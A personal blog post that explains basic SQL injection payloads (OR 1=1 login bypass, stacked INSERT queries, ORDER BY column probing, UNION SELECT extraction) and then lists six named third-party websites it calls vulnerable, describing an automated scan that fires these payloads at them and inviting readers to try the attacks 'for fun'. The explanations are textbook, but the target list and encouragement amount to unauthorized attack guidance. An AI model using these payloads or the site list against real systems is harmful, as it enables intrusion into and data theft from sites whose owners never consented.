What is up readers! This blog is about setting up a test on websites that could be vulnerable to one of the most well known, can-completely-takedown-your-website attack.

The legendary SQL injection...

Today I'm going to show and demonstrate some SQL injection basics and why it has been one of the most destructive. I'm also gonna show you my tool on how I scan and test URL/site that could be vulnerable for such attack.

SQL injection has been one of the most common web attack known for decades. It is one of the attackers' bread and butter on taking down the web application's database. It takes down your application, it can takedown your business, it can takedown your life! It is the deadliest injection ever known. From the name itself it is injecting SQL statements on input fields for execution by the underlying SQL database.

According to some recent Mozilla survey of the top one million websites analyzed, 93.45 percent earned an “F” for failure to implement basic security measures that would protect them from attacks, like Cross-site scripting, Layer 7 DOS and SQL Injection. One known cause for this is poor security hygiene by means of insecure coding. I myself had developed an app and developing in a secure code application is a must every developer's responsibility. Yes it may take some of the 'bling' your application may have, but you are going to choose, a more secure app or an app poor coded and insecure!

The Basics

One of my goal today is to refresh or introduce your mind to some sql injection basics that a normal attacker execute to exploit a web application. So today I'm going to show attacks you yourself can execute and try.

%27%20or1=1--'

In case we have query,

SELECT password FROM user_db WHERE name = 'admin' OR 1=1 -- '

Query selects password from table user_db where username is admin. Thus we also would like to pull in password where 1=1 which will always be true, thus all passwords will be returned. Additionally --' comment out the rest of the query.

Thus we can have this as,

http://www.url.com/user.php?user = john OR 1=1 --'

; INSERT INTO users

Let's say we have the query

SELECT *FROM cms_users where user_id = $user_id

The perfect way to exploit this is by

http://www.url.com/user.php?id = 23; INSERT INTO table1 (...)

which would equal to,

SELECT *FROM cms_users where user_id = $user_id ; INSERT INTO table1

This way we can execute alot of queries in a row indepent of the first query

AND 1=2

With the following SQL query:

SELECT * FROM users WHERE user_id=$user_id

Above will be equivalent to http query

https://www.url.com/user.php?id=12

So when the pentester play with some logic AND or OR, this will be

SELECT * FROM users WHERE user_id=12 AND 1=2

If there's any SQL error statement fired, it might indicate that no user on id has been found on the database. Thus we can set a TRUE statement https://www.url.com/user.php?id=12 AND 1=1

'or '1' = '1')) LIMIT 1/*&password=foo

We have the SQL query,

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

If the query returns a value it means that user matched the exact credentials, else access will be denied. So when we insert the values from the given fields,

$Username = 1' or '1' = '1

and

$password = 1'or '1' = '1

We then have,

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

With this query we can get the value without knowing the username or the password.

ORDER BY n-- (where n is a certain num)

This query is perfect to know how many columns are present in a particular table. If there's an output value then there are n or more queries on the table selected. If the query fails then it is less than n.

SELECT * FROM users WHERE user_id=12

Injected..

https://url.com/user = 12; ORDER by 5--

Equivalent to the new query we have below,

SELECT * FROM users WHERE user_id=12; ORDER by 5--

UNION SELECT 1,1,null--

UNION-based attacks allow the tester to easily extract information from the database. Because the UNION operator can only be used if both queries have the exact same structure, the attacker must craft a SELECT statement similar to the original query.

So let's say

SELECT name, description, price FROM products WHERE category=1 UNION SELECT 1 FROM all_tables

So attack would be,

http://url.com/category=1 UNION SELECT 1,1,null--

Automation

I have gathered some websites vulnerable for injection, and the list goes below.

http://vacationet.com/resort.php?id=22

http://jokusoftware.cz/file.php?id=icqj3

http://www.uselitewine.com/index.php?id=16

http://www.ellafitzgerald.com/viewheadline.php?id=34187

http://mathman.dreamhosters.com/MathMan/Organization.php?id=78

http://www.sherylblais.com/index.php?id=512

The idea is to scan these sites using my tool if vulnerable for SQL injection. If site can't be reached and 404 then it will output [errno socket error], else it will validate if such is vulnerable to such exploit or not.

Injection attack mentioned above is what we are going to use. Let's preview those shall we,

%27%20or1=1--

; INSERT INTO users

AND%201=2

ORDER BY 10--

'

UNION SELECT 1,1,null--

+OR+0x50=0x50

Now we have the list of sites and the attacks, its to concatenate -- URL + attack. We'll be doing it via http request..

RUN

A simple program that can manipulate the web server's database and cause a wild havoc on an organization. SQL injection's yet old, but will never be. You can try it out yourself and have some fun, given the vulnerable site try the sql injection attack and craft yours too.

krontek>halt